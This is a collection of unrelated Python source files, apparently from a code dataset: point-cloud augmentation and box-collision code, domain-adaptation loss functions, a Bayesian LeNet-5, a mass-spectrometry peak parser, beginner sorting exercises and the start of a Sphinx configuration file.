        if gt_boxes.shape[1] > 7:  # layout: x, y, z, w, h, l, vx, vy, r
            gt_boxes[:, 7] = -gt_boxes[:, 7]
    return gt_boxes, points
def random_flip_both(gt_boxes, points, probability=0.5, flip_coor=None):
    """Independently mirror the scene across the x axis and the y axis.

    Each flip fires with the given probability. The second mirror reflects
    x across 0 or, when ``flip_coor`` is given, across the line
    x = flip_coor. Operates in place.
    """
    # Flip across the x axis (negate y).
    do_flip = np.random.choice(
        [False, True], replace=False, p=[1 - probability, probability]
    )
    if do_flip:
        gt_boxes[:, 1] = -gt_boxes[:, 1]
        gt_boxes[:, -1] = -gt_boxes[:, -1] + np.pi
        points[:, 1] = -points[:, 1]
        if gt_boxes.shape[1] > 7:  # layout: x, y, z, w, h, l, vx, vy, r
            gt_boxes[:, 7] = -gt_boxes[:, 7]
    # Flip across the y axis (negate / reflect x).
    do_flip = np.random.choice(
        [False, True], replace=False, p=[1 - probability, probability]
    )
    if do_flip:
        if flip_coor is None:
            gt_boxes[:, 0] = -gt_boxes[:, 0]
            points[:, 0] = -points[:, 0]
        else:
            gt_boxes[:, 0] = flip_coor * 2 - gt_boxes[:, 0]
            points[:, 0] = flip_coor * 2 - points[:, 0]
        # TODO(review): confirm this yaw transform is right for an x mirror.
        gt_boxes[:, -1] = -gt_boxes[:, -1] + 2 * np.pi
        if gt_boxes.shape[1] > 7:
            gt_boxes[:, 6] = -gt_boxes[:, 6]
    return gt_boxes, points
def global_scaling_v2(gt_boxes, points, min_scale=0.95, max_scale=1.05):
    """Scale the scene by a factor drawn from [min_scale, max_scale], in place.

    Every box column except the last (yaw) is scaled, so centers, sizes and
    any velocity columns grow together with the point coordinates.
    """
    factor = np.random.uniform(min_scale, max_scale)
    points[:, :3] *= factor
    gt_boxes[:, :-1] *= factor
    return gt_boxes, points
def global_rotation_v2(gt_boxes, points, min_rad=-np.pi / 4, max_rad=np.pi / 4):
    """Rotate the scene around z by an angle drawn from [min_rad, max_rad].

    Point and box centers are rotated in place and the same angle is added
    to the box yaw column.
    """
    angle = np.random.uniform(min_rad, max_rad)
    for arr in (points, gt_boxes):
        arr[:, :3] = box_np_ops.rotation_points_single_angle(
            arr[:, :3], angle, axis=2
        )
    gt_boxes[:, -1] += angle
    return gt_boxes, points
@numba.jit(nopython=True)
def box_collision_test(boxes, qboxes, clockwise=True):
    """Pairwise 2-D collision test between two sets of convex quadrilaterals.

    Args:
        boxes: [N, 4, 2] corner coordinates.
        qboxes: [K, 4, 2] corner coordinates.
        clockwise: corner winding order of the inputs.

    Returns:
        [N, K] bool matrix; True where box i and qbox j overlap.
    """
    N = boxes.shape[0]
    K = qboxes.shape[0]
    ret = np.zeros((N, K), dtype=np.bool_)
    # Pair each corner with its successor to form the four edges of a box.
    slices = np.array([1, 2, 3, 0])
    lines_boxes = np.stack(
        (boxes, boxes[:, slices, :]), axis=2
    )  # [N, 4, 2(line), 2(xy)]
    lines_qboxes = np.stack((qboxes, qboxes[:, slices, :]), axis=2)
    # vec = np.zeros((2,), dtype=boxes.dtype)
    boxes_standup = box_np_ops.corner_to_standup_nd_jit(boxes)
    qboxes_standup = box_np_ops.corner_to_standup_nd_jit(qboxes)
    for i in range(N):
        for j in range(K):
            # Cheap reject: axis-aligned (standup) boxes must overlap first.
            iw = min(boxes_standup[i, 2], qboxes_standup[j, 2]) - max(
                boxes_standup[i, 0], qboxes_standup[j, 0]
            )
            if iw > 0:
                ih = min(boxes_standup[i, 3], qboxes_standup[j, 3]) - max(
                    boxes_standup[i, 1], qboxes_standup[j, 1]
                )
                if ih > 0:
                    # Segment-intersection test between every edge pair
                    # (orientation-sign trick): any crossing edge pair
                    # means the two quadrilaterals collide.
                    for k in range(4):
                        for l in range(4):
                            A = lines_boxes[i, k, 0]
                            B = lines_boxes[i, k, 1]
                            C = lines_qboxes[j, l, 0]
                            D = lines_qboxes[j, l, 1]
                            acd = (D[1] - A[1]) * (C[0] - A[0]) > (C[1] - A[1]) * (
                                D[0] - A[0]
                            )
                            bcd = (D[1] - B[1]) * (C[0] - B[0]) > (C[1] - B[1]) * (
                                D[0] - B[0]
                            )
                            if acd != bcd:
                                abc = (C[1] - A[1]) * (B[0] - A[0]) > (B[1] - A[1]) * (
                                    C[0] - A[0]
                                )
                                abd = (D[1] - A[1]) * (B[0] - A[0]) > (B[1] - A[1]) * (
                                    D[0] - A[0]
                                )
                                if abc != abd:
                                    ret[i, j] = True  # collision.
                                    break
                        # NOTE(review): ``is True`` / ``is False`` on a NumPy
                        # bool element relies on numba nopython semantics; in
                        # plain (un-jitted) Python these identity tests would
                        # not behave as equality — confirm before removing
                        # the @numba.jit decorator.
                        if ret[i, j] is True:
                            break
                    if ret[i, j] is False:
                        # No edge crossings: one box may still completely
                        # contain the other.
                        # now check complete overlap.
                        # box overlap qbox:
                        box_overlap_qbox = True
                        for l in range(4):  # point l in qboxes
                            for k in range(4):  # corner k in boxes
                                vec = boxes[i, k] - boxes[i, (k + 1) % 4]
                                if clockwise:
                                    vec = -vec
                                # Cross product sign tells on which side of
                                # edge k the qbox corner l lies.
                                cross = vec[1] * (boxes[i, k, 0] - qboxes[j, l, 0])
                                cross -= vec[0] * (boxes[i, k, 1] - qboxes[j, l, 1])
                                if cross >= 0:
                                    box_overlap_qbox = False
                                    break
                            if box_overlap_qbox is False:
                                break
                        if box_overlap_qbox is False:
                            # Symmetric test: is a boxes corner inside qbox j?
                            qbox_overlap_box = True
                            for l in range(4):  # point l in boxes
                                for k in range(4):  # corner k in qboxes
                                    vec = qboxes[j, k] - qboxes[j, (k + 1) % 4]
                                    if clockwise:
                                        vec = -vec
                                    cross = vec[1] * (qboxes[j, k, 0] - boxes[i, l, 0])
                                    cross -= vec[0] * (qboxes[j, k, 1] - boxes[i, l, 1])
                                    if cross >= 0:  #
                                        qbox_overlap_box = False
                                        break
                                if qbox_overlap_box is False:
                                    break
                            if qbox_overlap_box:
                                ret[i, j] = True  # collision.
                        else:
                            ret[i, j] = True  # collision.
    return ret
def global_translate_(gt_boxes, points, noise_translate_std):
    """Apply one random global translation to ``gt_boxes`` and ``points``.

    A translation vector is drawn from a zero-mean normal with per-axis
    standard deviations ``noise_translate_std`` (a scalar is broadcast to
    all three axes) and added, in place, to the point coordinates and box
    centers.

    Args:
        gt_boxes: [N, 7+] boxes; columns 0:3 are the center.
        points: [M, 4+] points; columns 0:3 are x, y, z.
        noise_translate_std: scalar or length-3 std for (x, y, z).

    Returns:
        The (mutated) ``gt_boxes`` and ``points``.
    """
    if not isinstance(noise_translate_std, (list, tuple, np.ndarray)):
        noise_translate_std = np.array(
            [noise_translate_std, noise_translate_std, noise_translate_std]
        )
    if all([e == 0 for e in noise_translate_std]):
        # Degenerate std on every axis: nothing to do.
        return gt_boxes, points
    noise_translate = np.array(
        [
            np.random.normal(0, noise_translate_std[0], 1),
            np.random.normal(0, noise_translate_std[1], 1),
            # Fixed: the z axis previously reused the x std (index 0).
            np.random.normal(0, noise_translate_std[2], 1),
        ]
    ).T
    points[:, :3] += noise_translate
    gt_boxes[:, :3] += noise_translate
    return gt_boxes, points
if __name__ == "__main__":
    # Smoke test: four axis-aligned boxes in (xmin, ymin, xmax, ymax) form;
    # boxes 0/1 overlap and boxes 2/3 overlap, so the printed collision
    # matrix should flag those pairs.
    bboxes = np.array(
        [
            [0.0, 0.0, 0.5, 0.5],
            [0.2, 0.2, 0.6, 0.6],
            [0.7, 0.7, 0.9, 0.9],
            [0.55, 0.55, 0.8, 0.8],
        ]
    )
    # Convert min/max boxes to the 4-corner form box_collision_test expects.
    bbox_corners = box_np_ops.minmax_to_corner_2d(bboxes)
    print(bbox_corners.shape)
    print(box_collision_test(bbox_corners, bbox_corners))
| 37.32651 | 88 | 0.552786 |
30e239408e1ecc4b3a0a09c52a722d47abb19835 | 612 | py | Python | ex080.py | rafaelclemes81/Python | 0e685b4e528a29bb23ecf11c9ccdbae8730b3ac3 | [
"MIT"
] | null | null | null | ex080.py | rafaelclemes81/Python | 0e685b4e528a29bb23ecf11c9ccdbae8730b3ac3 | [
"MIT"
] | null | null | null | ex080.py | rafaelclemes81/Python | 0e685b4e528a29bb23ecf11c9ccdbae8730b3ac3 | [
"MIT"
] | null | null | null | ''' CRIE UM PROGRAMA ONDE O USUÁRIO POSSA DIGITAR CINCO VALORES NUMÉRICOS E CADASTRE-OS EM UMA LISTA
JÁ NA POSIÇÃO CORRETA DE INSERÇÃO (SEM UTILIZAR O SORT). NO FINAL MOSTRE A LISTA ORDENADA NA TELA'''
lista = list()
for c in range(0,5):
n = int(input('Digite um valor: '))
if c == 0 or n > lista[-1]: # poderia usar na última expressão lista[len(lista)-1]
lista.append(n)
else:
pos = 0
while pos < len(lista):
if n <= lista[pos]:
lista.insert(pos, n)
break
pos += 1
print(f'O valores digitados em ordem foram {lista}')
| 38.25 | 100 | 0.599673 |
c83cd425aa75a93b630f78eac26c53ceee6714b7 | 5,068 | py | Python | utils/loss.py | weigq/UDA-1 | 4f97980980cafd0a2d02a77211ac7dbaf3e331f6 | [
"MIT"
] | 32 | 2021-11-08T15:45:30.000Z | 2022-03-30T09:08:57.000Z | utils/loss.py | weigq/UDA-1 | 4f97980980cafd0a2d02a77211ac7dbaf3e331f6 | [
"MIT"
] | 3 | 2021-11-16T02:38:51.000Z | 2022-02-21T13:29:58.000Z | utils/loss.py | weigq/UDA-1 | 4f97980980cafd0a2d02a77211ac7dbaf3e331f6 | [
"MIT"
] | 4 | 2021-11-09T02:53:18.000Z | 2021-12-21T22:11:35.000Z | # --------------------------------------------------------
# Copyright (c) 2021 Microsoft
# Licensed under The MIT License
# --------------------------------------------------------
import torch
from torch import Tensor
import torch.nn as nn
from utils.torch_funcs import grl_hook, entropy_func
class WeightBCE(nn.Module):
    """Weighted binary cross-entropy on probabilities (not logits).

    Each sample's BCE term is multiplied by a per-sample weight and the
    weighted sum is halved (batches hold a source half and a target half).
    """

    def __init__(self, epsilon: float = 1e-8) -> None:
        super(WeightBCE, self).__init__()
        # Numerical floor so log() never sees an exact zero.
        self.epsilon = epsilon

    def forward(self, x: Tensor, label: Tensor, weight: Tensor) -> Tensor:
        """
        :param x: [N, 1] predicted probabilities in (0, 1)
        :param label: [N, 1] binary targets
        :param weight: [N, 1] per-sample weights
        """
        target = label.float()
        pos_term = target * torch.log(x + self.epsilon)
        neg_term = (1 - target) * torch.log(1 - x + self.epsilon)
        bce = -(pos_term + neg_term)
        return torch.sum(bce * weight.float()) / 2.
def d_align_uda(softmax_output: Tensor, features: Tensor = None, d_net=None,
                coeff: float = None, ent: bool = False):
    """Domain-adversarial alignment loss for unsupervised domain adaptation.

    The first half of the batch is treated as source samples (domain label
    1) and the second half as target samples (domain label 0).

    Args:
        softmax_output: [2N, C] class probabilities, source rows first.
        features: optional [2N, D] features fed to ``d_net`` instead of the
            probabilities.
        d_net: domain discriminator; called with ``coeff`` (presumably for
            an internal gradient-reversal layer — confirm in its definition).
        coeff: gradient-reversal / scheduling coefficient.
        ent: if True, weight samples by prediction certainty (exp(-entropy)).

    Returns:
        Scalar weighted binary cross-entropy domain loss.
    """
    loss_func = WeightBCE()
    d_input = softmax_output if features is None else features
    d_output = d_net(d_input, coeff=coeff)
    d_output = torch.sigmoid(d_output)
    batch_size = softmax_output.size(0) // 2
    # Domain labels: 1 for the source half, 0 for the target half.
    labels = torch.tensor([[1]] * batch_size + [[0]] * batch_size).long().cuda()  # 2N x 1
    if ent:
        # Certainty weighting: confident (low-entropy) samples get larger
        # weights; the hook also reverses the entropy gradient by ``coeff``.
        x = softmax_output
        entropy = entropy_func(x)
        entropy.register_hook(grl_hook(coeff))
        entropy = torch.exp(-entropy)
        source_mask = torch.ones_like(entropy)
        source_mask[batch_size:] = 0
        source_weight = entropy * source_mask
        target_mask = torch.ones_like(entropy)
        target_mask[:batch_size] = 0
        target_weight = entropy * target_mask
        # Normalize so each domain's weights sum to one.
        weight = source_weight / torch.sum(source_weight).detach().item() + \
                 target_weight / torch.sum(target_weight).detach().item()
    else:
        # Uniform weights over each domain half.
        weight = torch.ones_like(labels).float() / batch_size
    loss_alg = loss_func.forward(d_output, labels, weight.view(-1, 1))
    return loss_alg
def d_align_msda(softmax_output: Tensor, features: Tensor = None, d_net=None,
                 coeff: float = None, ent: bool = False, batchsizes: list = []):
    """Domain-alignment loss for multi-source DA with unequal batch halves.

    Unlike ``d_align_uda``, the source/target split sizes are given
    explicitly and the discriminator is trained with a (possibly
    multi-class) cross-entropy instead of a sigmoid + BCE.

    Args:
        softmax_output: [B_S + B_T, C] class probabilities, source rows first.
        features: optional features fed to ``d_net`` instead of probabilities.
        d_net: domain discriminator; called with ``coeff``.
        coeff: gradient-reversal / scheduling coefficient.
        ent: if True, weight samples by prediction certainty (exp(-entropy)).
        batchsizes: [B_S, B_T] source and target batch sizes.

    Returns:
        Scalar weighted cross-entropy domain loss.
    """
    d_input = softmax_output if features is None else features
    d_output = d_net(d_input, coeff=coeff)
    # Domain labels: 1 for the B_S source rows, 0 for the B_T target rows.
    labels = torch.cat(
        (torch.tensor([1] * batchsizes[0]).long(), torch.tensor([0] * batchsizes[1]).long()), 0
    ).cuda()  # [B_S + B_T]
    if ent:
        # Certainty weighting, normalized per domain (see d_align_uda).
        x = softmax_output
        entropy = entropy_func(x)
        entropy.register_hook(grl_hook(coeff))
        entropy = torch.exp(-entropy)
        source_mask = torch.ones_like(entropy)
        source_mask[batchsizes[0]:] = 0
        source_weight = entropy * source_mask
        target_mask = torch.ones_like(entropy)
        target_mask[:batchsizes[0]] = 0
        target_weight = entropy * target_mask
        weight = source_weight / torch.sum(source_weight).detach().item() + \
                 target_weight / torch.sum(target_weight).detach().item()
    else:
        weight = torch.ones_like(labels).float() / softmax_output.shape[0]
    # Per-sample CE, then the weighted sum collapses it to a scalar.
    loss_ce = nn.CrossEntropyLoss(reduction='none')(d_output, labels)
    loss_alg = torch.sum(weight * loss_ce)
    return loss_alg
class MMD(nn.Module):
    """Maximum Mean Discrepancy with a multi-scale Gaussian (RBF) kernel.

    The bandwidth is estimated from the mean pairwise squared distance of
    the stacked samples and then spread over ``kernel_num`` geometric
    scales separated by factors of ``kernel_mul``.
    """

    def __init__(self, kernel_mul=2.0, kernel_num=5):
        super(MMD, self).__init__()
        self.kernel_num = kernel_num
        self.kernel_mul = kernel_mul
        self.fix_sigma = None  # optional fixed-bandwidth override

    def _guassian_kernel(self, source, target, kernel_mul=2.0, kernel_num=5, fix_sigma=None):
        """Return the summed multi-bandwidth RBF kernel over all sample pairs."""
        n_samples = int(source.size()[0]) + int(target.size()[0])
        stacked = torch.cat([source, target], dim=0)
        dim = int(stacked.size(1))
        # Pairwise squared Euclidean distances via two broadcast expansions.
        rows = stacked.unsqueeze(0).expand(n_samples, n_samples, dim)
        cols = stacked.unsqueeze(1).expand(n_samples, n_samples, dim)
        sq_dist = ((rows - cols) ** 2).sum(2)
        if fix_sigma:
            bandwidth = fix_sigma
        else:
            # Mean over the off-diagonal pair count (n^2 - n).
            bandwidth = torch.sum(sq_dist.data) / (n_samples ** 2 - n_samples)
        # Center the geometric ladder of bandwidths around the estimate.
        bandwidth = bandwidth / (kernel_mul ** (kernel_num // 2))
        sigmas = [bandwidth * (kernel_mul ** i) for i in range(kernel_num)]
        return sum(torch.exp(-sq_dist / s) for s in sigmas)

    def forward(self, source, target):
        # Number of source samples; used to slice the stacked kernel matrix.
        m = int(source.size()[0])
        kernels = self._guassian_kernel(
            source, target, kernel_mul=self.kernel_mul,
            kernel_num=self.kernel_num, fix_sigma=self.fix_sigma
        )
        k_ss = kernels[:m, :m]
        k_tt = kernels[m:, m:]
        k_st = kernels[:m, m:]
        k_ts = kernels[m:, :m]
        # Biased MMD^2 estimate: E[k(s,s')] + E[k(t,t')] - 2 E[k(s,t)].
        return torch.mean(k_ss) + torch.mean(k_tt) - torch.mean(k_st) - torch.mean(k_ts)
| 38.687023 | 112 | 0.597869 |
ec6a340faa63755296500279ec2eed105ea305b8 | 2,321 | py | Python | tensorflow_probability/my_tfp_bdl/models/bayesian_lenet5.py | zhoudoao-bayes/tf-probability | 2c8975cad9ab4103f4fb2b277c4ed0763a488796 | [
"Apache-2.0"
] | null | null | null | tensorflow_probability/my_tfp_bdl/models/bayesian_lenet5.py | zhoudoao-bayes/tf-probability | 2c8975cad9ab4103f4fb2b277c4ed0763a488796 | [
"Apache-2.0"
] | null | null | null | tensorflow_probability/my_tfp_bdl/models/bayesian_lenet5.py | zhoudoao-bayes/tf-probability | 2c8975cad9ab4103f4fb2b277c4ed0763a488796 | [
"Apache-2.0"
] | null | null | null | # zhoudoao@foxmail.com
# 2020.5.12
""" Bayesian LeNet-5 and LeNet-5 model.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow.compat.v2 as tf
import tensorflow_probability as tfp
tf.enable_v2_behavior()
tfd = tfp.distributions
def bayesian_lenet5(num_classes,
                    kl_divergence_function):
    """Build a Bayesian LeNet-5 using TFP Flipout variational layers.

    Args:
        num_classes: size of the softmax output layer.
        kl_divergence_function: callable attached to every Flipout layer
            as its kernel KL-divergence regulariser.

    Returns:
        An uncompiled ``tf.keras.Sequential`` model.
    """
    def conv(filters):
        # 5x5 Flipout convolution sharing the KL regulariser.
        return tfp.layers.Convolution2DFlipout(
            filters, kernel_size=5, padding='SAME',
            kernel_divergence_fn=kl_divergence_function,
            activation=tf.nn.relu)

    def pool():
        return tf.keras.layers.MaxPooling2D(
            pool_size=[2, 2], strides=[2, 2],
            padding='SAME')

    layers = [
        conv(6),
        pool(),
        conv(16),
        pool(),
        conv(120),
        tf.keras.layers.Flatten(),
        tfp.layers.DenseFlipout(
            84, kernel_divergence_fn=kl_divergence_function,
            activation=tf.nn.relu),
        tfp.layers.DenseFlipout(
            num_classes, kernel_divergence_fn=kl_divergence_function,
            activation=tf.nn.softmax),
    ]
    return tf.keras.models.Sequential(layers)
def lenet5(num_classes, activation=tf.nn.relu):
    """Build a standard (deterministic) LeNet-5 classifier.

    Args:
        num_classes: size of the softmax output layer.
        activation: activation used by every conv/dense hidden layer.

    Returns:
        An uncompiled ``tf.keras.Sequential`` model.
    """
    def conv(filters):
        return tf.keras.layers.Conv2D(filters, kernel_size=5, padding='SAME',
                                      activation=activation)

    def pool():
        return tf.keras.layers.MaxPooling2D(pool_size=[2, 2], strides=[2, 2],
                                            padding='SAME')

    layers = [
        conv(6),
        pool(),
        conv(16),
        pool(),
        conv(120),
        tf.keras.layers.Flatten(),
        tf.keras.layers.Dense(84, activation=activation),
        tf.keras.layers.Dense(num_classes, activation=tf.nn.softmax),
    ]
    return tf.keras.models.Sequential(layers)
| 31.364865 | 70 | 0.638949 |
e3f787eeffcd480f5b455b1bad4e227fabeff746 | 73 | py | Python | ch7/7_6.py | hajin-kim/2020-HighSchool-Python-Tutoring | 352025a954bff37d21cc3d59e7d5e0f0269a1f17 | [
"MIT"
] | null | null | null | ch7/7_6.py | hajin-kim/2020-HighSchool-Python-Tutoring | 352025a954bff37d21cc3d59e7d5e0f0269a1f17 | [
"MIT"
] | null | null | null | ch7/7_6.py | hajin-kim/2020-HighSchool-Python-Tutoring | 352025a954bff37d21cc3d59e7d5e0f0269a1f17 | [
"MIT"
] | null | null | null | n = int(input("횟수 입력: "))
for i in range(n):
print(i+1)
print("반복 끝!")
| 12.166667 | 25 | 0.547945 |
1504ef5ebbcec937b7b358d4300870e0d20906ea | 9,006 | py | Python | leo/peakparser/peakparser.py | jfizzy/ResistanceDB | 829d2912c92f645172cdc984a5a2e6119eae8226 | [
"MIT"
] | null | null | null | leo/peakparser/peakparser.py | jfizzy/ResistanceDB | 829d2912c92f645172cdc984a5a2e6119eae8226 | [
"MIT"
] | null | null | null | leo/peakparser/peakparser.py | jfizzy/ResistanceDB | 829d2912c92f645172cdc984a5a2e6119eae8226 | [
"MIT"
] | null | null | null | ''' packages '''
#import traceback
#import sys
import csv
import re
import peakparser.peak as peak_module
class PeakParser:
    """Reads a MAVEN-generated peak list and removes excess, unnecessary data.

    The parser expects a tab-delimited export whose first 24 columns are
    peak metadata and whose later columns hold intensities for mzXML
    samples named like ``...hilicneg15_<sample>_t<k>.mzxml``.
    """

    def __init__(self, config):
        """Store the parser configuration.

        Args:
            config: object exposing PEAKS_FILE, OUTPUT_FILE, CONDENSED_FILE,
                MAXRTDIFF, MZRATIO and MINMZ attributes.
        """
        # Index of the first intensity (sample) column in the MAVEN export.
        self.data_offset = 24
        self._intensities = {}
        # Maps data-column index (0-based past the offset) -> (name, time).
        self._colnames = {}
        self._config = config

    # parse a peaks file
    # fields we are interested in (0 aligned):
    #   4: medMz
    #   5: medRt
    #   8: compound
    #   9: compound ID (usually same as compound)
    #   10: category
    #   12: expectedRtDiff, difference between found RT and medRt
    #   14: parent
    #   15-24: not used
    #   24+ mzXML peak data (column name might be of interest)
    def parse_peaks_file(self):
        """Parse the configured peaks file (assumed tab-delimited).

        Returns:
            A list of Peak objects that pass the RT-difference and
            intensity-disparity filters, or None on a read error.
        """
        filename = self._config.PEAKS_FILE
        peaks = None
        try:
            print("trying to open {}".format(filename))
            with open(filename, 'rt') as csvfile:
                reader = csv.reader(csvfile, delimiter='\t')
                # to hold the peak data
                peaks = []
                # Header row: names of the mzXML sample files.
                row = reader.__next__()
                col_names = [str(s).lower() for s in row[self.data_offset:] if s != ""]
                # Store column names as {index: (name, time)}; index is an
                # offset into the data columns (starting at self.data_offset).
                for idx, col_name in enumerate(col_names):
                    self._colnames[idx] = self.strip_col_name(col_name)
                for row in reader:
                    # Intensities for this peak: {sample: {time: value}}.
                    intensities = {}
                    # Ensure there is actual peak data in the row.
                    if len(row) > self.data_offset:
                        med_mz = float(row[4])
                        med_rt = float(row[5])
                        compound = str(row[8])
                        category = str(row[10])
                        rt_diff = float(row[12])
                        parent = float(row[14])
                        # Collect every data column for this peak.
                        for col in range(24, len(row)):
                            cname = self._colnames[col - self.data_offset][0]
                            time = self._colnames[col - self.data_offset][1]
                            # Skip blank (control) samples.
                            if "blank" in cname:
                                continue
                            if cname in intensities:
                                intensities[cname][time] = float(row[col])
                            else:
                                intensities[cname] = {time: float(row[col])}
                        peak = peak_module.Peak(med_mz, med_rt, compound, \
                            category, rt_diff, parent, intensities)
                        # Keep only peaks whose RT difference is acceptable...
                        if peak.verify_rt_diff(self._config.MAXRTDIFF):
                            # ...and whose intensities meet the configured
                            # minimum and disparity-ratio thresholds.
                            if peak.verify_instensity_dispartiy(self._config.MZRATIO, self._config.MINMZ):
                                peaks.append(peak)
        except IndexError as ex:
            print("Error reading in csv file. Error message: {}".format(str(ex)))
            return None
        except Exception as ex:
            # Previously a bare ``except`` that printed only "Bad open";
            # keep the best-effort behaviour but report what went wrong.
            print("Bad open: {}".format(ex))
        return peaks

    def strip_col_name(self, col_name):
        """Split a raw column name into a (sample name, time label) pair.

        Returns:
            (sample, time) where ``time`` is like "t2", or "mid" when no
            t-number is present; (-1, None) when the column is not a
            recognised hilicneg15 sample.
        """
        time_re = r"t[0-9]+"
        findstr = "hilicneg15_"
        index = col_name.find(findstr, 0, len(col_name))
        if index != -1:
            cutoff = index + len(findstr)
            sample_name = col_name[cutoff:]
            sample_name = sample_name.replace(".mzxml", "")
            times = re.findall(time_re, sample_name)
            if times:
                time = str(times[0])
            else:
                time = "mid"
            # Remove the trailing "_t<k>" from the sample name, if present.
            time_cutoff = sample_name.find(time, 0, len(sample_name))
            if time_cutoff != -1:
                # Fixed: this previously re-tested ``index`` (always true
                # here), which truncated two characters from sample names
                # that carried no t-number.
                sample_name = sample_name[0:time_cutoff - 1]
        else:
            return (-1, None)
        return (sample_name, time)

    def write_condensed_csv(self, peaks):
        """Write a condensed CSV: one intensity delta per sample.

        Example: if t0 = 100 and t4 = 10000 for some organism, the written
        value for that compound/organism is the difference 9900 (or 0 when
        the two readings are too similar, ratio <= 0.5).
        """
        filename = self._config.CONDENSED_FILE
        if isinstance(peaks, list):
            if peaks and isinstance(peaks[0], peak_module.Peak):
                with open(filename, "w+") as csvfile:
                    csvwriter = csv.writer(csvfile, delimiter="\t", quotechar="\"", lineterminator='\n')
                    # Header: metadata columns, then one column per sample.
                    row = ["medMz", "medRt", "compound", "category", "rt_diff", "parent"]
                    for colname, _ in peaks[0].intensities.items():
                        row.append(colname)
                    csvwriter.writerow(row)
                    for peak in peaks:
                        row = [str(peak.med_mz), str(peak.med_rt), str(peak.compound), str(peak.category), str(peak.rt_diff), str(peak.parent)]
                        for _, tests in peak.intensities.items():
                            difference = None
                            if len(tests) >= 2:
                                for _, value in tests.items():
                                    # NOTE(review): ``not difference`` also
                                    # treats a first reading of exactly 0 as
                                    # "unseen" — confirm this is intended.
                                    if not difference:
                                        difference = value
                                    else:
                                        # Only keep the delta when the two
                                        # readings differ by more than 50%.
                                        ratio = 1
                                        if max(difference, value) != 0:
                                            ratio = 1 - (min(difference, value) / max(difference, value))
                                        if ratio > .5:
                                            difference = value - difference
                                        else:
                                            difference = 0
                                row.append(difference)
                            else:
                                # Fewer than two time points: no delta.
                                row.append(0)
                        csvwriter.writerow(row)
            else:
                print("Input must be of type peak")
        else:
            print("Input must be a list of peaks.")

    def write_peaks_csv(self, peaks):
        """Write the full list of peaks (all time points) to a CSV file."""
        filename = self._config.OUTPUT_FILE
        if isinstance(peaks, list):
            if peaks and isinstance(peaks[0], peak_module.Peak):
                try:
                    ## should add a regex to check filename
                    with open(filename, "w+") as csvfile:
                        csvwriter = csv.writer(csvfile, delimiter="\t", quotechar="\"", lineterminator='\n')
                        row = ["medMz", "medRt", "compound", "category", "rt_diff", "parent"]
                        # Header: one column per (sample, time) combination,
                        # in the order they appear on the first peak.
                        for colname, tests in peaks[0].intensities.items():
                            for test_time, _ in tests.items():
                                row.append(colname + "_" + test_time)
                        csvwriter.writerow(row)
                        for peak in peaks:
                            row = [str(peak.med_mz), str(peak.med_rt), str(peak.compound), str(peak.category), str(peak.rt_diff), str(peak.parent)]
                            intensities = []
                            for _, tests in peak.intensities.items():
                                for _, value in tests.items():
                                    intensities.append(value)
                            row = row + [str(intensity) for intensity in intensities]
                            csvwriter.writerow(row)
                except Exception as ex:
                    print("Error writing csv file...{}".format(str(ex)))
            else:
                # Fixed: previously tested ``peaks == 0`` (always False for
                # a list) and then indexed ``peaks[0]`` even when the list
                # was empty, raising IndexError.
                if not peaks:
                    print("Attempted to write empty peaks list.")
                else:
                    print("Received unknown list element type. Exiting.")
                return
        else:
            print("Input must be a list of Peak type.")
            return
| 40.936364 | 147 | 0.462025 |
9e55d0fafb702791f6fddc743a30892cd8fd97f6 | 1,076 | py | Python | SelectionSort.py | sairohithpasala/Sorting-Algorithms | 73d24bdf40a0b5ef79bd72275835319c32666338 | [
"MIT"
] | null | null | null | SelectionSort.py | sairohithpasala/Sorting-Algorithms | 73d24bdf40a0b5ef79bd72275835319c32666338 | [
"MIT"
] | null | null | null | SelectionSort.py | sairohithpasala/Sorting-Algorithms | 73d24bdf40a0b5ef79bd72275835319c32666338 | [
"MIT"
] | null | null | null | # Python program for SELECTION SORT
import timeit
def SelectSort(Arr):
    """Sort ``Arr`` in place in ascending order using selection sort.

    Each pass swaps the smallest element of the unsorted suffix into
    position: O(n^2) comparisons, O(n) swaps.
    """
    length = len(Arr)
    for boundary in range(length):
        # Locate the minimum of the unsorted suffix Arr[boundary:].
        smallest = boundary
        for candidate in range(boundary + 1, length):
            if Arr[candidate] < Arr[smallest]:
                smallest = candidate
        # Move it to the front of the suffix.
        Arr[boundary], Arr[smallest] = Arr[smallest], Arr[boundary]
Arr=[]
n = int(input("Enter number of elements : "))
print ("Enter the array")
for i in range(0, n):
ele = int(input()) #Input the data into the list
Arr.append(ele)
print ("Given array is", end="\n")
print(Arr)
print('\n')
start = timeit.default_timer()
SelectSort(Arr) #passing the array to be sorted through function
print ("Sorted array with Selection Sort is: \t\t\t")
print(Arr)
stop = timeit.default_timer()
print("Execution Time is",stop - start,"seconds")
| 29.888889 | 104 | 0.577138 |
506e091d5e612f147c17ddaf220c58b64b38911d | 16,695 | py | Python | docs/conf.py | MrMonkey94/causalnex | 96f110cedccd6e84297bb4382d92fd9e725bfc13 | [
"Apache-2.0"
] | 1 | 2020-01-29T17:08:32.000Z | 2020-01-29T17:08:32.000Z | docs/conf.py | MrMonkey94/causalnex | 96f110cedccd6e84297bb4382d92fd9e725bfc13 | [
"Apache-2.0"
] | null | null | null | docs/conf.py | MrMonkey94/causalnex | 96f110cedccd6e84297bb4382d92fd9e725bfc13 | [
"Apache-2.0"
] | 1 | 2020-01-29T17:08:35.000Z | 2020-01-29T17:08:35.000Z | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# causalnex documentation build configuration file,
# created by, sphinx-quickstart on Mon Dec 18 11:31:24 2017.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import importlib
import re
import shutil
import sys
from distutils.dir_util import copy_tree
from inspect import getmembers, isclass, isfunction
from pathlib import Path
from typing import List
import patchy
from click import secho, style
from sphinx.ext.autosummary.generate import generate_autosummary_docs
from causalnex import __version__ as release
# -- Project information -----------------------------------------------------
project = "causalnex"
copyright = "2020, QuantumBlack"
author = "QuantumBlack"
# The short X.Y version.
version = re.match(r"^([0-9]+\.[0-9]+).*", release).group(1)
# -- General configuration ---------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
"sphinx.ext.autodoc",
"sphinx.ext.autosummary",
"sphinx.ext.napoleon",
"sphinx_autodoc_typehints",
"sphinx.ext.doctest",
